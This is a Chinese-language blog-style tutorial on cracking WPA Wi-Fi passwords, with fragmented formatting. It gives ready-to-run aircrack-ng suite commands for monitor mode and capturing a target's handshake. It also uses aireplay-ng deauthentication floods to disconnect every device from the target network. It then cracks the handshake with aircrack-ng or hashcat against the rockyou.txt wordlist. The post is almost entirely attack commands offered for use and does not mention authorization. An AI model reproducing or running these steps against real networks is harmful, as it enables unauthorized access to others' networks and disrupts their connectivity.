接下來4天會有比較不一樣的內容分享!
今天分享的無線網路破解需要有"監控模式"的網卡才能進行喔!
ifconfig
查看系統中的網絡接口。wl
開頭,例如 wlo1
)。iwconfig
確認無線網卡的名稱及當前模式。ifconfig [interface] down
關閉無線網卡(例如 ifconfig wlo1 down
)。iwconfig [interface] mode monitor
將無線網卡設置為監聽模式(例如 iwconfig wlo1 mode monitor
)。ifconfig [interface] up
重新啟動無線網卡(例如 ifconfig wlo1 up
)。iwconfig
確認無線網卡是否成功切換至監聽模式。airmon-ng check wlo1
來檢查可能干擾攻擊的進程。airmon-ng check kill
來終止這些進程,避免干擾。airodump-ng wlo1
開始捕獲周圍所有無線接入點的信息。Ctrl+C
停止捕獲,並記住目標Wi-Fi的CH(Channel)和MAC地址(BSSID)。輸入以下命令針對特定目標Wi-Fi進行數據捕獲:
airodump-ng -c [CH] --bssid [MAC地址] -w [文件名] wlo1
這將專注於捕獲指定Wi-Fi的數據,包括握手數據。
aireplay-ng -0 0 -a [MAC地址] wlo1
來持續發送Deauthentication數據包,將所有設備從目標Wi-Fi斷開。(只需要執行幾秒就可以ctrl+C中斷).cap
擴展名的文件,其內含四向握手數據。.cap
文件中。rockyou.txt
。locate rockyou.txt
找到該文件的位置,一般位於 /usr/share/wordlists/rockyou.txt.gz
。rockyou.txt.gz
文件複製到桌面,然後使用 gzip -d rockyou.txt.gz
解壓縮文件。cat rockyou.txt
或 nano rockyou.txt
查看和編輯解壓縮後的 rockyou.txt
文件。在終端中輸入以下命令開始破解:
aircrack-ng -w rockyou.txt [你的 .cap 文件名]
命令中的 w
參數指定密碼列表文件,隨後是包含握手數據的 .cap
文件。
該命令將開始測試密碼列表中的每個密碼,並嘗試與 .cap
文件中的握手數據匹配。
hashcat
或 hashcat --help
來查看幫助菜單,了解 Hashcat 的使用方法和可用選項。2500
。.cap
文件轉換為 Hashcat 支持的格式
.cap
文件轉換為 .hccapx
格式。.cap
文件轉換為 .hccapx
文件,然後下載該文件並保存到桌面。
使用以下命令構建 Hashcat 的破解命令:
hashcat -a 0 -m 2500 [你的 .hccapx 文件名] [你的 rockyou.txt 字典文件]
其中:
a 0
指定使用簡單模式(也就是低級攻擊模式)。m 2500
指定要破解的哈希類型為 WPA EAPOL PBKDF2。[你的 .hccapx 文件名]
是之前轉換後的 .hccapx
文件。[你的 rockyou.txt 字典文件]
是我們使用的密碼字典文件。S
鍵查看當前的破解進度。